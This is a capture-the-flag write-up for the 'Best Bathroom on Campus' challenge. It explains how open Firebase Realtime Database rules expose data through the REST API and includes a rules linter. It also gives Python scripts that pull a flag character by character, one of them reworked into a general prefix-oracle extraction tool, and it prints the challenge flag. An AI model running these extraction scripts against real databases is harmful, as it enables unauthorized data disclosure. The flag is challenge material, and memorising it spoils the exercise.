BlueHensCTF 2023 - Best Bathroom on Campus

Best Bathroom on Campus

Venturing into a Firebase database, where flags are hidden as treasures in places you least expect them.

Introduction

In this challenge, participants were given a hint pointing towards the "Best Bathroom on Campus". Following it led to a Firebase Realtime Database URL, which suggested misconfigured database security rules and a possible data disclosure.

Firebase Misconfiguration

Firebase is Google's application platform; its Realtime Database is a cloud-hosted NoSQL database that stores one large JSON tree. The most common Firebase weakness is misconfigured security rules. When a node is world-readable (".read": true, or no rule restricting it), anyone can fetch it through the REST API by appending ".json" to the node's URL, with no authentication at all. A locked-down database answers the same request with HTTP 401 and {"error": "Permission denied"}, and a readable path that holds no data answers null. In this challenge the database answered unauthenticated requests under /flag/, and those answers were what the next step relied on.
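The check a practitioner would run before (or instead of) writing an exploit is to classify what the REST API says about a node and to lint the rules document itself. The following is an added example, not code from the original writeup: the response classifier and the rules linter run offline on constructed sample inputs, while probe_database issues a real request and is only an illustration of how the classifier would be used against a live project (the project name and paths passed to it are assumptions).

```python
import json
import urllib.error
import urllib.request

# Constructed sample responses, modelled on what the Realtime Database REST
# API returns for a readable node, a denied read, and a readable-but-empty path.
OPEN_BODY = '{"config": {"debug": true, "apiKey": "AIza...constructed"}}'
LOCKED_BODY = '{"error": "Permission denied"}'
EMPTY_BODY = 'null'

# Constructed rules documents: the weak default, a hardened variant, and one
# where only a sub-tree is public.
WEAK_RULES = '{"rules": {".read": true, ".write": true}}'
HARDENED_RULES = '{"rules": {"flag": {".read": "auth != null", ".write": false}}}'
NESTED_RULES = '{"rules": {".read": false, "public": {".read": true}}}'


def classify_rtdb_response(status, body):
    """Map one REST reply to 'open', 'locked', 'empty', 'invalid' or 'unknown'."""
    if status == 401:          # the security rules denied the read
        return "locked"
    if status == 400:          # bad path, e.g. a key containing . $ # [ ] or /
        return "invalid"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except ValueError:         # not JSON at all; treat as inconclusive
        return "unknown"
    return "empty" if data is None else "open"


def rules_allow_public_read(rules_json):
    """Return the paths whose '.read' rule is unconditionally true."""
    doc = json.loads(rules_json)
    found = []

    def walk(node, path):
        if not isinstance(node, dict):
            return
        read = node.get(".read")
        # Rules may be a JSON boolean or an expression string; both "true" forms are public.
        if read is True or (isinstance(read, str) and read.strip() == "true"):
            found.append(path or "/")
        for key, child in node.items():
            if not key.startswith("."):   # '.read', '.write', '.validate' are rules, not paths
                walk(child, f"{path}/{key}")

    walk(doc.get("rules", {}), "")
    return found


def probe_database(project, path=""):
    """Fetch <path>.json from a project (assumed name) and classify the reply.

    shallow=true asks only for the top-level keys, so a confirmation does not
    pull the whole tree. Network access required; not exercised offline.
    """
    url = f"https://{project}.firebaseio.com/{path}.json?shallow=true"
    req = urllib.request.Request(url, headers={"User-Agent": "rtdb-audit"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify_rtdb_response(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return classify_rtdb_response(err.code, err.read().decode())


if __name__ == "__main__":
    print("weak rules public at:", rules_allow_public_read(WEAK_RULES))
    print("hardened rules public at:", rules_allow_public_read(HARDENED_RULES))
    print("sample open reply:", classify_rtdb_response(200, OPEN_BODY))
```

Run the linter against the rules exported from the Firebase console (Realtime Database, Rules tab) and the probe against your own project URL; any "/" entry from the linter or an "open" from the probe on the root path means the database is readable by anyone who knows its name.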

Flag Retrieval

With the Firebase URL and the predictable flag format UDCTF{...}, a character-by-character brute force was devised. For every candidate character c the script requests /flag/UDCTF{<known prefix>c.json; a response body of true confirms that the extended prefix is a key the database will serve, so each correct character costs at most one pass over the character set. The script below uses Python with the aiohttp library.

import aiohttp
import asyncio
import string
import sys
from urllib.parse import quote

# Every request targets a child of /flag/UDCTF{ ; the database answers `true`
# for a key it will serve and `null` for one it does not know.
base_url = "https://best-bathroom-default-rtdb.firebaseio.com/flag/UDCTF{"
end_url = ".json"

# Firebase keys may not contain . $ # [ ] or / ; the remaining punctuation is
# percent-encoded before it goes into the URL so that ? # % and friends cannot
# be interpreted as URL syntax. Sorting keeps the probe order reproducible.
forbidden_key_chars = set('.$#[]/')
allowed_punctuation = set(string.punctuation) - forbidden_key_chars
charset = string.ascii_letters + string.digits + ''.join(sorted(allowed_punctuation))

async def check_flag(session, flag):
    url = base_url + quote(flag, safe='') + end_url
    async with session.get(url) as response:
        try:
            return await response.json()
        except aiohttp.ContentTypeError:  # non-JSON body, e.g. an HTML error page
            return None

flag = ""

async def main():
    global flag
    async with aiohttp.ClientSession() as session:
        while True:
            progressed = False
            for char in charset:
                candidate = flag + char
                sys.stdout.write(f'\rCharacter: {char} | Current String: UDCTF{{{candidate}')
                sys.stdout.flush()
                response = await check_flag(session, candidate)
                if response is True:
                    flag = candidate
                    progressed = True
                    if char == "}":
                        # flag already ends with the closing brace
                        print(f'\rFlag found: UDCTF{{{flag}')
                        return
                    break  # extend the prefix, then start the next position from the top
            if not progressed:
                # No character extended the prefix: the charset is incomplete or the
                # oracle changed; stop instead of looping forever on the same prefix.
                print(f'\rNo character extended UDCTF{{{flag} ; giving up')
                return

if __name__ == '__main__':
    asyncio.run(main())

After running the script, it didn't take long to find the flag.
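The search above is a generic prefix-oracle extraction: any endpoint that answers "yes" for a correct prefix and "no" for everything else can be drained one character at a time. The following is an added example, not part of the original writeup, that separates the search from the transport so it can be run offline against a simulated oracle (SIMULATED_FLAG is a constructed value, not the challenge flag) and probes all candidates for a position concurrently under a semaphore; make_live_probe shows how the same search would be pointed at a real Realtime Database URL (the base URL is an assumption and is not exercised offline).

```python
import asyncio
import json
import string
import urllib.error
import urllib.request
from urllib.parse import quote

# Same key alphabet as the challenge script: Firebase forbids . $ # [ ] and / in keys.
CHARSET = (string.ascii_letters + string.digits
           + ''.join(sorted(set(string.punctuation) - set('.$#[]/'))))

# Constructed stand-in for the database: the key under /flag/ that the rules serve.
SIMULATED_FLAG = "UDCTF{t3st_fl4g}"


async def simulated_probe(prefix):
    """Mimic GET /flag/<prefix>.json: `true` for a served key prefix, None otherwise."""
    await asyncio.sleep(0)  # yield to the loop the way a network call would
    return True if SIMULATED_FLAG.startswith(prefix) else None


def make_live_probe(base_url, end_url=".json"):
    """Build a probe for a real Realtime Database node (assumed URL; needs network)."""
    def fetch(prefix):
        url = base_url + quote(prefix, safe="") + end_url
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return json.loads(resp.read().decode())
        except (urllib.error.HTTPError, ValueError):
            return None  # 401 permission denied, 400 bad key, or a non-JSON body

    async def probe(prefix):
        return await asyncio.to_thread(fetch, prefix)
    return probe


async def extract(probe, known="UDCTF{", charset=CHARSET, terminator="}", concurrency=16):
    """Grow `known` one character per round until it ends with `terminator`.

    Returns (recovered string, number of probe calls made). Raises if a round
    yields no hit (alphabet incomplete) or several (oracle is not a strict
    prefix check), rather than guessing or spinning.
    """
    sem = asyncio.Semaphore(concurrency)
    requests = 0

    async def guarded(candidate):
        async with sem:
            return candidate, await probe(candidate)

    while not known.endswith(terminator):
        results = await asyncio.gather(*(guarded(known + c) for c in charset))
        requests += len(charset)
        hits = [cand for cand, ok in results if ok is True]
        if len(hits) != 1:
            raise RuntimeError(f"expected exactly one match after {known!r}, got {hits}")
        known = hits[0]
    return known, requests


def recover_flag(probe):
    """Synchronous entry point: run the extraction to completion."""
    return asyncio.run(extract(probe))


if __name__ == "__main__":
    flag, n = recover_flag(simulated_probe)
    print(f"recovered {flag} in {n} probes")
    # Against a live database (assumed URL), swap in:
    # recover_flag(make_live_probe("https://best-bathroom-default-rtdb.firebaseio.com/flag/"))
```

The request count is what makes the oracle affordable: each position costs one pass over the 88-character alphabet rather than an exponential search, so the constructed 16-character flag is recovered in 880 probes, and the concurrency limit keeps that from turning into a denial of service against the target.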

Flag: UDCTF{1ce_L4br4t0ry_s3C0nd_Fl0or_b0y's_b4thr00m}

Conclusion

This challenge shows why database configuration deserves the same scrutiny as application code, especially for cloud-hosted databases like Firebase, where the security rules are the only thing standing between the public REST API and the data. Auditing Realtime Database rules for unauthenticated .read and .write access, and requesting /.json against a project's own URL as part of a security review, catches this class of disclosure before someone else does.